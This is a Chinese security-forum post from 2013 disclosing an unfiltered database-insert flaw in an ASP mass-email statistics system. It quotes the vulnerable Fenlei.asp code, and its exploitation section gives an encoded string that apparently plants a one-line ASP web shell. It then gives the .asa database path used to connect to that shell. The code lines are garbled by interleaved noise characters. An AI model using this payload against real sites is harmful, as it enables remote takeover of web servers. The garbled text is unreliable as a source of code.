找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2002|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
% w, ^8 t% j4 t
6 b. n7 Z& C4 a; J4 ]: Q# S2 aIF Request.QueryString("Action")="del" Then
. c" W8 z5 N; Q( l) P- {! A4 c; SID=Request.QueryString("ID") . V; Z# ^2 |) I$ V
IF Countss ("tui","Fenlei",ID )<>0 then   D% ?) ]+ n5 h8 Z2 J8 W8 G
'略 ! B% a* J9 U5 W4 J3 J, z
IF Request.QueryString("Action")="Add" Then
- x) Y# I. [7 z  `3 d# eTname=Request.Form("Typename") ! O- o; T+ ^( p  j% e, \
Set Rs=Server.CreateObject("adodb.Recordset")
2 m% g- w$ k: ]Sql="Select * From Fenlei Order by id Desc "
! Z3 ?( J5 f, eRs.Open Sql,Conn,1,3
0 ]: x, m" S1 m. t8 V2 s1 t7 ARs.Addnew 0 m6 j' G( J/ t4 [- ^* b' G: g
Rs("Typename")=Tname
, H: u' e: J* g3 i. m1 k'略
9 |; S; R6 J" D- o% U3 v, uSet Rs=Server.CreateObject("adodb.Recordset") # }3 s) B, S1 ?! J( W; R0 w+ c
Sql="Select * From Fenlei Order by id Desc "
' @# C" W$ R6 L" c4 ERs.Open Sql,Conn,1,1
+ |5 H( ?/ Q; J& }/ C& l'略   c9 s4 k! C: K7 D
%>
  a5 j7 p' L9 R/ ]- d   l' Q4 \( j1 T* O0 c" N5 m% ~

: \# {4 N3 O! f, T" [7 @ + G1 h- U4 V! F2 \2 J
没有过滤,直接写入数据库。' b& u9 ~" B" d( z  \$ r

( R5 I8 M( \. Y9 {利用方法:  a( Z  D3 d* \$ K" }, n" J

- `9 ~9 `# v" v. j插入:┼攠數畣整爠煥敵瑳∨≡┩>% ?& R0 ?1 e# U$ s* l1 Z( e  y

: q6 v! H" d4 G( \# @3 N# D- \
  u; L  |. |) t9 @% i9 t9 V/ x连接: http://www.xxx.com/###tongbaner.asa
. ?8 D* R: A1 @& j7 I. T'默认安装文件: % F% @9 J; _7 Y( A; r# v' x5 }
'install.asp; s4 n6 Q5 Q. Z9 T5 v- E2 i! S" m& c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表